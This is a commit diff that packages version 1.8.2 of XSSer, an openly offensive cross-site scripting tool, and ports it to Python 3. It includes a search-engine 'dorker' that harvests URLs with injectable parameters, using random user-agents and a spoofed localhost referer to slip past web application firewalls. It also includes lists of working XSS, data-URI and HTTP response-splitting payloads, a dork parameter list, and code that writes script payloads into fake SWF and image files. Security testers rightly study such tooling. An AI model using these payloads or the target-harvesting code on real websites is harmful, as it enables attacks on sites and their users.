Commit 7e38fb9e authored by Sophie Brun's avatar Sophie Brun

New upstream version 1.8-2

parent dcd05d73
This diff is collapsed.
GPL Cooperation Commitment
Version 1.0
Before filing or continuing to prosecute any legal proceeding or claim
(other than a Defensive Action) arising from termination of a Covered
License, we commit to extend to the person or entity ('you') accused
of violating the Covered License the following provisions regarding
cure and reinstatement, taken from GPL version 3. As used here, the
term 'this License' refers to the specific Covered License being
enforced.
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly
and finally terminates your license, and (b) permanently, if the
copyright holder fails to notify you of the violation by some
reasonable means prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you
have received notice of violation of this License (for any work)
from that copyright holder, and you cure the violation prior to 30
days after your receipt of the notice.
We intend this Commitment to be irrevocable, and binding and
enforceable against us and assignees of or successors to our
copyrights.
Definitions
'Covered License' means the GNU General Public License, version 2
(GPLv2), the GNU Lesser General Public License, version 2.1
(LGPLv2.1), or the GNU Library General Public License, version 2
(LGPLv2), all as published by the Free Software Foundation.
'Defensive Action' means a legal proceeding or claim that We bring
against you in response to a prior proceeding or claim initiated by
you or your affiliate.
'We' means each contributor to this repository as of the date of
inclusion of this file, including subsidiaries of a corporate
contributor.
This work is available under a Creative Commons Attribution-ShareAlike
4.0 International license (https://creativecommons.org/licenses/by-sa/4.0/).
......@@ -4,7 +4,7 @@ PYTHON=`which python`
DESTDIR=/
BUILDIR=$(CURDIR)/debian/xsser
PROJECT=xsser
VERSION=0.7.0
VERSION=1.8.2
all:
@echo "make source - Create source package"
......
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......
This diff is collapsed.
This diff is collapsed.
......@@ -2,9 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
This file is part of the xsser project, https://xsser.03c8.net
This file is part of the XSSer project, https://xsser.03c8.net
Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -20,20 +20,24 @@ with xsser; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
........
List of search engines: http://en.wikipedia.org/wiki/List_of_search_engines
List of search engines: https://en.wikipedia.org/wiki/List_of_search_engines
Currently supported: duck(default), startpage, yahoo, bing
"""
import urllib2, traceback, re, random
urllib2.socket.setdefaulttimeout(5.0)
import urllib.request, urllib.error, urllib.parse, traceback, re, random
urllib.request.socket.setdefaulttimeout(5.0)
DEBUG = 0
class Dorker(object):
def __init__(self, engine='yahoo'):
def __init__(self, engine='duck'):
self._engine = engine
self.search_engines = [] # available dorking search engines
self.search_engines.append('bing')
self.search_engines.append('duck')
self.search_engines.append('startpage')
self.search_engines.append('yahoo')
self.search_engines.append('bing')
self.agents = [] # user-agents
try:
f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
......@@ -46,41 +50,63 @@ class Dorker(object):
"""
Perform a search and return links.
"""
if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018
search_url = 'https://www.bing.com/search?q="' + search + '"'
elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018
search_url = 'https://search.yahoo.com/search?q="' + search + '"'
if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018 -> 26-08-2019
search_url = 'https://www.bing.com/search?q="' + str(search) + '"'
print("\nSearching query:", urllib.parse.unquote(search_url))
elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018 -> 26-08-2019
search_url = 'https://search.yahoo.com/search?q="' + str(search) + '"'
print("\nSearching query:", urllib.parse.unquote(search_url))
elif self._engine == 'duck': # works at 26-08-2019
search_url = 'https://duckduckgo.com/html/'
q = 'instreamset:(url):"' + str(search) + '"' # set query to search literally on results
query_string = { 'q':q }
print("\nSearching query:", urllib.parse.unquote(search_url) + " [POST: (" + q + ")]")
elif self._engine == 'startpage': # works at 26-08-2019
search_url = 'https://www.startpage.com/do/asearch'
q = 'url:"' + str(search) + '"' # set query to search literally on results
query_string = { 'cmd':'process_search', 'query':q }
print("\nSearching query:", urllib.parse.unquote(search_url) + " [POST: (" + q + ")]")
else:
print "\n[Error] This search engine is not supported!\n"
print "[Info] List of available:"
print '-'*25
print("\n[Error] This search engine is not being supported!\n")
print('-'*25)
print("\n[Info] Use one from this list:\n")
for e in self.search_engines:
print "+ "+e
print ""
print("+ "+e)
print("\n ex: xsser -d 'profile.asp?num=' --De 'duck'")
print(" ex: xsser -l --De 'startpage'")
print("\n[Info] Or try them all:\n\n ex: xsser -d 'news.php?id=' --Da\n")
try:
self.search_url = search_url
print "\n[Info] Search query:", urllib2.unquote(search_url)
user_agent = random.choice(self.agents).strip() # set random user-agent
referer = '127.0.0.1' # set referer to localhost / WAF black magic!
headers = {'User-Agent' : user_agent, 'Referer' : referer}
req = urllib2.Request(search_url, None, headers)
html_data = urllib2.urlopen(req).read()
print "\n[Info] Retrieving requested info..."
except urllib2.URLError, e:
if self._engine == 'bing' or self._engine == 'yahoo': # using GET
req = urllib.request.Request(search_url, None, headers)
elif self._engine == 'duck' or self._engine == 'startpage': # using POST
data = urllib.parse.urlencode(query_string)
req = urllib.request.Request(search_url, data, headers)
html_data = urllib.request.urlopen(req).read().decode('utf8')
print("\n[Info] Retrieving requested info...\n")
except urllib.error.URLError as e:
if DEBUG:
traceback.print_exc()
print "\n[Error] Cannot connect!"
print("\n[Error] Cannot connect!")
print("\n" + "-"*50)
return
if self._engine == 'bing':
regex = '<h2><a href="(.+?)" h=' # regex magics 09-04/2018
regex = '<h2><a href="(.+?)" h=' # regex magics 08/2019
if self._engine == 'yahoo':
regex = 'RU=(.+?)/RK=' # regex magics [09/04/2018]
regex = 'RU=(.+?)/RK=' # regex magics 08/2019
if self._engine == 'duck':
regex = '<a class="result__url" href="(.+?)">' # regex 08/2019
if self._engine == 'startpage':
regex = 'target="_blank">(.+?)</a>' # regex magics 08/2019
pattern = re.compile(regex)
links = re.findall(pattern, html_data)
links = re.findall(pattern, html_data, flags=0)
found_links = []
if links:
for link in links:
link = urllib2.unquote(link)
link = urllib.parse.unquote(link)
if self._engine == "yahoo":
if "RU=https://www.yahoo.com/" in link:
link = "" # invalid url
......@@ -90,14 +116,14 @@ class Dorker(object):
if link2 not in found_links: # parse that target is not duplicated
found_links.append(link)
else:
print "\n[Info] Not any link found for that query!"
print("\n[Error] Not any link found for that query!")
return found_links
if __name__ == '__main__':
for a in ['yahoo', 'bing']:
for a in ['bing', 'yahoo', 'duck', 'startpage']: # working at: 28/08/2019
dork = Dorker(a)
res = dork.dork("news.php?id=")
if res:
print "[+]", a, ":", len(res), "\n"
print("\n[+] Search Engine:", a, "| Found: ", len(res), "\n")
for b in res:
print " *", b
print(" *", b)
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -21,7 +19,7 @@ You should have received a copy of the GNU General Public License along
with xsser; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import urllib
import urllib.request, urllib.parse, urllib.error
class EncoderDecoder(object):
"""
......@@ -80,7 +78,7 @@ class EncoderDecoder(object):
"""
encoded=''
for char in string:
encoded=encoded+urllib.quote(char)
encoded=encoded+urllib.parse.quote(char)
return encoded
def _ipDwordEncode(self, string):
......@@ -102,15 +100,15 @@ class EncoderDecoder(object):
def _ipOctalEncode(self, string):
"""
Encode to octal.
"""
"""
encoded=''
tblIP = string.split('.')
# In the case it's not an IP
if len(tblIP)!=4:
return 0
octIP = map(lambda s: oct(int(s)).zfill(4), tblIP)
octIP = [oct(int(s)).zfill(4) for s in tblIP]
return ".".join(octIP)
if __name__ == "__main__":
encdec = EncoderDecoder()
print encdec._ipOctalEncode("127.0.0.1")
print(encdec._ipOctalEncode("127.0.0.1"))
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -30,8 +28,8 @@ class FlashInjections(object):
def flash_xss(self, filename, payload):
"""
Create -fake- flash movie (.swf) with code XSS injected.
"""
Create -fake- flash movie (.swf) with XSS codeinjected.
"""
root, ext = os.path.splitext(filename)
if ext.lower() in [".swf"]:
f = open(filename, 'wb')
......@@ -42,11 +40,11 @@ class FlashInjections(object):
content = user_payload
f.write(content)
f.close()
flash_results = "\nCode: "+ content + "\nFile: ", root + ext
flash_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n"
else:
flash_results = "\nPlease select a filename with extension .swf"
flash_results = "\n[Error] Supported extensions = .swf\n"
return flash_results
if __name__ == '__main__':
flash_xss_injection = FlashInjections('')
print flash_xss_injection.flash_xss('FlashXSSpoison.swf' , "<script>alert('XSS')</script>")
print(flash_xss_injection.flash_xss('FlashXSSpoison.swf' , "<script>alert('XSS')</script>"))
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -26,30 +24,36 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
## Happy Cross Hacking! ;)
DCPvectors = [
{ 'payload' : """<a href="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv YT4=""",
'browser' : """[Data Control Protocol Injection]""" },
{ 'payload' : """<iframe src="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv""",
{ 'payload' : """<a href="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></a>[B64]""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<iframe src="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></[B64]""",
'browser' : """[Data Control Protocol Injection]"""},
#{ 'payload' : """data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+""",
# 'browser' : """[Data Control Protocol Injection]"""},
#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KCJYU1MiKStBRHMtaGlzdG9yeS5iYWNrKCkrQURzQVBBLS9z-""",
# 'browser' : """[Data Control Protocol Injection]""" },
#{ 'payload' : """data:text/html;base64,LCtBRHdBY3dCakFISUFhUUJ3QUhRQVBnKy1hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCkrQURz""",
# 'browser' : """[Data Control Protocol Injection]""" },
#{ 'payload' : """data:text/html;base64,K0FEd0Fjd0JqQUhJQWFRQndBSFFBUGdCaEFHd0FaUUJ5QUhRQUtBQXhBQ2tBT3dCb0FHa0Fjd0Iw""",
# 'browser' : """[Data Control Protocol Injection]""" },
#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KFhTUykrQURzLWhpc3RvcnkuYmFjaygpK0FEc0FQQS0vc2Ny aXB0K0FENC0=""",
# 'browser' : """[Data Control Protocol Injection]""" },
{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+'))""",
{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]'))""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==""",
'browser' : """[Data Control Protocol Injection]""" }
{ 'payload' : """<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"&#09;&#10;&#11;>Y</a""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<EMBED SRC="data:image/svg+xml;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]" type="image/svg+xml" AllowScriptAccess="always"></EMBED>""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<embed src="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></embed>""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<iframe/src="data:text/html;&Tab;base64&Tab;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<object data="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></object>""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<object data=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]></object>​""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """data:image/svg+xml;base64,[B64]<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="Y"><script type="text/ecmascript">alert("PAYLOAD");</script></svg>[B64]""",
'browser' : """[Data Control Protocol Injection]""" }
]
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -26,19 +24,14 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
## Happy Cross Hacking! ;)
DOMvectors = [
{ 'payload' : """?notname=PAYLOAD""",
'browser' : """[Document Object Model Injection]"""},
{ 'payload' : """?notname=PAYLOAD&""",
'browser' : """[Document Object Model Injection]"""},
{ 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
'browser' : """[Document Object Model Injection]"""},
{ 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""",
'browser' : """[Document Object Model Injection]"""},
{ 'payload' : """?name=Y%0d%0a%0d%0aPAYLOAD""",
'browser' : """[Document Object Model Injection]"""},
{ 'payload' : """?foobar=name=PAYLOAD&""",
'browser' : """[Document Object Model Injection]"""}
]
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -26,41 +24,26 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
## Happy Cross Hacking! ;)
HTTPrs_vectors = [
{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;XSS&lt;/html&gt;
""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """XSS%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("XSS")</script>""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0D%0ASet-Cookie%3AXSS""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22XSS%22)%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1""",
{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;PAYLOAD&lt;/html&gt;""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """PAYLOAD%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("PAYLOAD")</script>""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0D%0ASet-Cookie%3APAYLOAD""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22PAYLOAD%22)%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3Ehttp://www.test.com""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
'browser' : """[Induced Injection]"""},
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
""",
'browser' : """[Induced Injection]"""},
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
""",
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
'browser' : """[Induced Injection]"""},
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('%58%53%53');%2BADw-/script%2BAD4-
""",
'browser' : """[Induced Injection]""" }
{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('PAYLOAD');%2BADw-/script%2BAD4-""",
'browser' : """[Induced Injection]""" }
]
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......
.php?cmd=
.php?z=
.php?q=
.php?search=
.php?query=
.php?searchst­ring=
.php?keyword=­
.php?file=
.php?years=
.php?txt=
.php?tag=
.php?max=
.php?from=
.php?author=
.php?pass=
.php?feedback­=
.php?mail=
.php?cat=
.php?vote=
search.php?q=
headersearch.p­hp?sid=
/news.php?id=
/search_results.php?search=
/notice.php?msg=
/view.php?PID=
/search.php?search_keywords=
/contentPage.php?id=
/main.php?sid=
/feedpost.php?url=
/poll/­default.asp?catid=
?id=
?url=
?search=
?query=
?cmd=
?z=
?q=
?l=
?r=
?searchstring=
?keyword=­
?file=
?years=
?txt=
?tag=
?max=
?from=
?author=
?pass=
?feedback­=
?mail=
?cat=
?vote=
?sid=
?msg=
?category=
?PID=
?search_keywords=
?mid=
?catid=
?pid=
?order_direction=
?course_id=
?session=
?sfunction=
?search_keywords=
?site=
?errmsg=
?decl_id=
?num=
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -26,79 +24,50 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
## Happy Cross Hacking! ;)
heuristic_test = [
# ascii
{ 'payload' : """XSS\\XSS""",
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS/XSS""",
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS>XSS""",
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS<XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS;XSS""",
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS'XSS""",
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : '''XSS"XSS''',
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS=XSS""",
'browser' : """[Heuristic test]""" },
# hex/une
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS%5CXSS""",
'browser' : """[Heuristic test]""" },
# / is the same on Unicode than in ASCII
#{ 'payload' : """XSS/XSS""",
# 'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS%3EXSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS%3CXSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS%3BXSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS%27XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : '''XSS%22XSS''',
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS%3DXSS""",
'browser' : """[Heuristic test]""" },
# dec
{ 'payload' : """XSS&#92XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS&#47XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS&#62XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS&#60XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS&#59XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS&#39XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : '''XSS&#34XSS''',
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS&#61XSS""",
'browser' : """[Heuristic test]""" }
]
This diff is collapsed.
This diff is collapsed.
This diff is collapsed.
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -34,16 +32,13 @@ class ImageInjections(object):
"""
# check user image name input valid extensions
root, ext = os.path.splitext(filename)
# create file and inject code
# create file and inject code
if ext.lower() in [".png", ".jpg", ".gif", ".bmp"]:
f = open(filename, 'wb')
# check user payload input
user_payload = payload
if not user_payload:
user_payload = "<script>alert('XSS')</script>"
# inject each XSS specific code
if ext.lower() == ".png":
content = '‰PNG' + user_payload
......@@ -53,16 +48,14 @@ class ImageInjections(object):
content = 'ÿØÿà JFIF' + user_payload
elif ext.lower() == ".bmp":
content = 'BMFÖ' + user_payload
# write and close
f.write(content)